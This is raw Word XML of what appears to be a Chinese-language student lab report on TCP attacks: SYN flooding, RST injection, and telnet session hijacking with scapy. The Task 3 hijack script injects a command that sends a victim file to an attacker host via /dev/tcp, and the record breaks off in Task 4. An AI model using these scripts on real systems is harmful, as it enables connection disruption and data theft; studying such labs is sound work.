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81251" w14:textId="73E943AF" w:rsidR="00C32D2F" w:rsidRPr="00396292" w:rsidRDefault="00396292">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00396292">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00396292">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ASK 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D67DE5" w14:textId="6117EFF6" w:rsidR="00396292" w:rsidRDefault="00396292">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E5DA3AE" w14:textId="34925DEB" w:rsidR="00A57B1D" w:rsidRDefault="00A57B1D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先telnet连接受害者主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E29C5AD" w14:textId="5669A018" w:rsidR="00A57B1D" w:rsidRDefault="00A57B1D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="417C764D" wp14:editId="53754F22">
            <wp:extent cx="5274310" cy="2608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A345" w14:textId="25E95618" w:rsidR="00A57B1D" w:rsidRDefault="00A57B1D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功登录，检查T</w:t>
      </w:r>
      <w:r>
        <w:t>CP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039891D7" w14:textId="17B06ABB" w:rsidR="00A57B1D" w:rsidRDefault="00A57B1D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B86E5F9" wp14:editId="53B9BDBA">
            <wp:extent cx="5274310" cy="7956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3976" w14:textId="223A3127" w:rsidR="00A57B1D" w:rsidRDefault="003646FD">
      <w:pPr>
        <w:ind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0FF488" wp14:editId="307CD5FF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>266700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>220980</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="259080"/>
            <wp:effectExtent l="0" t="0" r="254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78"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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然后在主机中执行如下命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3254C0" w14:textId="0B8FAF06" w:rsidR="003646FD" w:rsidRDefault="003646FD">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA6E756" w14:textId="5013E70F" w:rsidR="003646FD" w:rsidRDefault="003646FD">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，登录攻击者主机，执行如下命令，在受害者主机中查看连接状态，结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7829D3" w14:textId="26940471" w:rsidR="003646FD" w:rsidRDefault="003646FD">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29B6F814" wp14:editId="2AC14AEF">
            <wp:extent cx="5274310" cy="1915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1C4C" w14:textId="5C5F13C8" w:rsidR="003646FD" w:rsidRDefault="003646FD">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4686B753" w14:textId="2313BEFE" w:rsidR="003646FD" w:rsidRDefault="003646FD">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在未清除缓存下再次telnet，可以发现仍能登录，与</w:t>
      </w:r>
      <w:r w:rsidR="007262EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="007262EE">
        <w:t>20.04</w:t>
      </w:r>
      <w:r w:rsidR="007262EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的观察描述一样</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0A1248" w14:textId="454DEF9D" w:rsidR="007262EE" w:rsidRDefault="007262EE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DC8670" wp14:editId="59EE2616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5274310" cy="278765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="698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在1</w:t>
      </w:r>
      <w:r>
        <w:t>0.9.0.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中查看，保留了如下记录使得仍能成功登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FE6EF0" w14:textId="77777777" w:rsidR="007262EE" w:rsidRDefault="007262EE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4792EB2B" w14:textId="2003F9A6" w:rsidR="007262EE" w:rsidRDefault="00B32E05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02F1E76" wp14:editId="538D2195">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>594360</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="78422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2EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入如下命令后，再次登录</w:t>
      </w:r>
      <w:r w:rsidR="007262EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="42DFB193" wp14:editId="724BE777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067300" cy="182880"/>
            <wp:effectExtent l="0" t="0" r="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C7A99" w14:textId="451A60E5" w:rsidR="00B32E05" w:rsidRDefault="005F2DA3">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时telnet连接超时，登录失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1E742B" w14:textId="684E2785" w:rsidR="007262EE" w:rsidRDefault="007262EE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="194F03B8" w14:textId="687D6EBA" w:rsidR="00B32E05" w:rsidRDefault="00B32E05">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00B32E05">
        <w:t>docker-compose.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中开启</w:t>
      </w:r>
      <w:r>
        <w:t>10.9.0.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B32E05">
        <w:t>SYN cookies 防御机制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，后再次尝试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0358AE23" w14:textId="2F0DBB06" w:rsidR="00B32E05" w:rsidRDefault="00B32E05">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5472E68E" wp14:editId="543E7AF1">
            <wp:extent cx="5274310" cy="1666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ACC5" w14:textId="3D873E64" w:rsidR="00B32E05" w:rsidRDefault="00B32E05">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FCCC922" wp14:editId="092A7997">
            <wp:extent cx="5274310" cy="19177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6670" w14:textId="5940CC71" w:rsidR="00B32E05" w:rsidRDefault="00B32E05">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="530A23E4" wp14:editId="7BED4A1A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F4C7" w14:textId="50BE98C3" w:rsidR="00B32E05" w:rsidRDefault="00B32E05">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF75911" w14:textId="3E20AE0D" w:rsidR="00937EA8" w:rsidRDefault="00937EA8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06C21081" w14:textId="5DFFC7EE" w:rsidR="00937EA8" w:rsidRDefault="00937EA8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A5CF9A" w14:textId="53FC517F" w:rsidR="00937EA8" w:rsidRPr="00937EA8" w:rsidRDefault="00937EA8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00937EA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00937EA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ASK 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CF6635" w14:textId="1B9CDF71" w:rsidR="00937EA8" w:rsidRDefault="0063665E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S首先在一台客户机上登录服务端</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C34BB2E" w14:textId="1135FFB6" w:rsidR="0063665E" w:rsidRDefault="0063665E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59D6B4C7" wp14:editId="2FF9DC86">
            <wp:extent cx="5274310" cy="2614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5EE9" w14:textId="5F9F9D7E" w:rsidR="0063665E" w:rsidRDefault="00337699">
      <w:pPr>
        <w:ind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715A34" wp14:editId="2654219D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-543560</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>281940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6572293" cy="187452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93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65E">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="0063665E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ireshark查看报文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13731365" w14:textId="7C77FC38" w:rsidR="0063665E" w:rsidRDefault="0063665E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EFF0406" w14:textId="743065B2" w:rsidR="0063665E" w:rsidRDefault="0063665E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后攻击者对连接发起攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53914227" w14:textId="1BC6145C" w:rsidR="00337699" w:rsidRDefault="00337699">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1907DC66" wp14:editId="4E9A14E4">
            <wp:extent cx="5274310" cy="31908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3764" w14:textId="01C1A934" w:rsidR="00337699" w:rsidRDefault="00337699">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>根据</w:t>
      </w:r>
      <w:r w:rsidR="008B74FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>捕获的包构造rst</w:t>
      </w:r>
      <w:r w:rsidR="008B74FB">
        <w:t>.py</w:t>
      </w:r>
      <w:r w:rsidR="008B74FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AA2ABC" w14:textId="77777777" w:rsidR="008B74FB" w:rsidRDefault="008B74FB" w:rsidP="008B74FB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B365F23" w14:textId="77777777" w:rsidR="008B74FB" w:rsidRDefault="008B74FB" w:rsidP="008B74FB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FECB0D4" w14:textId="77777777" w:rsidR="008B74FB" w:rsidRDefault="008B74FB" w:rsidP="008B74FB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3648C388" w14:textId="77777777" w:rsidR="008B74FB" w:rsidRDefault="008B74FB" w:rsidP="008B74FB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>ip = IP(src="10.9.0.5", dst="10.9.0.6")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2081FE77" w14:textId="77777777" w:rsidR="008B74FB" w:rsidRDefault="008B74FB" w:rsidP="008B74FB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>tcp = TCP(sport=23, dport=50202, flags="R", seq=1525524355)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360BEEB4" w14:textId="77777777" w:rsidR="008B74FB" w:rsidRDefault="008B74FB" w:rsidP="008B74FB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>pkt = ip/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D13035" w14:textId="77777777" w:rsidR="008B74FB" w:rsidRDefault="008B74FB" w:rsidP="008B74FB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>ls(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E828528" w14:textId="795E73B7" w:rsidR="008B74FB" w:rsidRDefault="008B74FB" w:rsidP="008B74FB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>send(pkt,verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378A3508" w14:textId="77777777" w:rsidR="008B74FB" w:rsidRDefault="008B74FB" w:rsidP="008B74FB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2444885F" w14:textId="08205C9A" w:rsidR="0063665E" w:rsidRDefault="00337699">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFF1856" w14:textId="7D84E95B" w:rsidR="00337699" w:rsidRDefault="00337699">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="086B1797" wp14:editId="04FB0C31">
            <wp:extent cx="5274310" cy="376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5479" w14:textId="6E2AA602" w:rsidR="008B74FB" w:rsidRDefault="008B74FB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="752F84E6" w14:textId="3B0A543B" w:rsidR="008B74FB" w:rsidRDefault="008B74FB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="164E2BD6" w14:textId="6E3AEC7D" w:rsidR="008B74FB" w:rsidRDefault="00746632">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00746632">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00746632">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ASK 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658F7CC8" w14:textId="4CB2EAC8" w:rsidR="00746632" w:rsidRPr="004A152D" w:rsidRDefault="00746632">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E5EA9A" w14:textId="5B7CE9A6" w:rsidR="00746632" w:rsidRDefault="004A152D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="004A152D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先客户机登录服务器1</w:t>
      </w:r>
      <w:r w:rsidRPr="004A152D">
        <w:t>0.9.0.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，输入ls</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者在wireshark里检查包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7B8315" w14:textId="5846B524" w:rsidR="004A152D" w:rsidRDefault="004A152D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9EE9BB" wp14:editId="12F15CF4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2313940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6212794" cy="2644140"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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794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F749A79" wp14:editId="032857A4">
            <wp:extent cx="4419600" cy="217574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0196" cy="218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2550" w14:textId="29648357" w:rsidR="004A152D" w:rsidRDefault="004A152D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="100F6325" w14:textId="1D7F2F4F" w:rsidR="00C462AC" w:rsidRDefault="00C462AC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>随后，攻击者执行劫持程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33469ED3" w14:textId="1456A1D7" w:rsidR="00C462AC" w:rsidRDefault="00C462AC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16F439B5" wp14:editId="25ADB71D">
            <wp:extent cx="5274310" cy="13995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6176" w14:textId="70728D77" w:rsidR="00C462AC" w:rsidRDefault="00C462AC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC697C" w14:textId="77777777" w:rsidR="00C462AC" w:rsidRDefault="00C462AC" w:rsidP="00C462AC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27276821" w14:textId="77777777" w:rsidR="00C462AC" w:rsidRDefault="00C462AC" w:rsidP="00C462AC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD288AA" w14:textId="77777777" w:rsidR="00C462AC" w:rsidRDefault="00C462AC" w:rsidP="00C462AC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>ip = IP(src="10.9.0.6", dst="10.9.0.5")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D1B0F6" w14:textId="77777777" w:rsidR="00C462AC" w:rsidRDefault="00C462AC" w:rsidP="00C462AC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>tcp = TCP(sport=50204, dport=23, flags="A", seq=1072100486, ack=1126115038)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077E809F" w14:textId="77777777" w:rsidR="00C462AC" w:rsidRDefault="00C462AC" w:rsidP="00C462AC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>data = "\r cat /home/seed/file1.txt &gt; /dev/tcp/10.9.0.1/9090\r"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B191088" w14:textId="77777777" w:rsidR="00C462AC" w:rsidRDefault="00C462AC" w:rsidP="00C462AC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>pkt = ip/tcp/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9BFC4C" w14:textId="77777777" w:rsidR="00C462AC" w:rsidRDefault="00C462AC" w:rsidP="00C462AC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>ls(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AA0151" w14:textId="76C85F26" w:rsidR="00C462AC" w:rsidRDefault="00C462AC" w:rsidP="00C462AC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>send(pkt,verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EBA09F" w14:textId="77777777" w:rsidR="00C462AC" w:rsidRDefault="00C462AC" w:rsidP="00C462AC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF72B60" w14:textId="1C4C7BCE" w:rsidR="00C462AC" w:rsidRPr="00C462AC" w:rsidRDefault="00776D4A" w:rsidP="00C462AC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00C462AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ireshark里查看包发现成功劫持</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE53662" w14:textId="56012D1E" w:rsidR="00C462AC" w:rsidRDefault="00C462A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62CAAFF" wp14:editId="68A8B6FC">
            <wp:extent cx="5919768" cy="244602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2958" cy="24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A0F6" w14:textId="1D6CF366" w:rsidR="004A152D" w:rsidRDefault="004A152D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77C24BFF" w14:textId="1ADEAE66" w:rsidR="00443A34" w:rsidRPr="00443A34" w:rsidRDefault="00443A34">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00443A34">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00443A34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ASK 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7304D14F" w14:textId="6BD54BB4" w:rsidR="00443A34" w:rsidRDefault="00443A34">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70C6319F" w14:textId="2C8870B8" w:rsidR="00443A34" w:rsidRDefault="00443A34">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先在攻击者主机上开启端口监听</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09591498" w14:textId="650C2B80" w:rsidR="00443A34" w:rsidRDefault="00443A34">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FA89EF3" wp14:editId="60137213">
            <wp:extent cx="5274310" cy="9956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BD38" w14:textId="4C839579" w:rsidR="00443A34" w:rsidRDefault="00443A34">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0A153A" w14:textId="63073772" w:rsidR="00443A34" w:rsidRDefault="00AF3926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E582725" wp14:editId="61F9FCE9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-739140</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>205740</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6898005" cy="2529840"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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00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A34">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>捕捉客户端与服务端交互的最新数据包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，据此构造程序如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E6607C" w14:textId="77777777" w:rsidR="00AF3926" w:rsidRDefault="00AF3926" w:rsidP="00AF3926">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61104F1C" w14:textId="77777777" w:rsidR="00AF3926" w:rsidRDefault="00AF3926" w:rsidP="00AF3926">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B7CBC0" w14:textId="77777777" w:rsidR="00AF3926" w:rsidRDefault="00AF3926" w:rsidP="00AF3926">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1051C7" w14:textId="77777777" w:rsidR="00AF3926" w:rsidRDefault="00AF3926" w:rsidP="00AF3926">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>ip = IP(src="10.9.0.6", dst="10.9.0.5")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1E0EA5" w14:textId="77777777" w:rsidR="00AF3926" w:rsidRDefault="00AF3926" w:rsidP="00AF3926">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
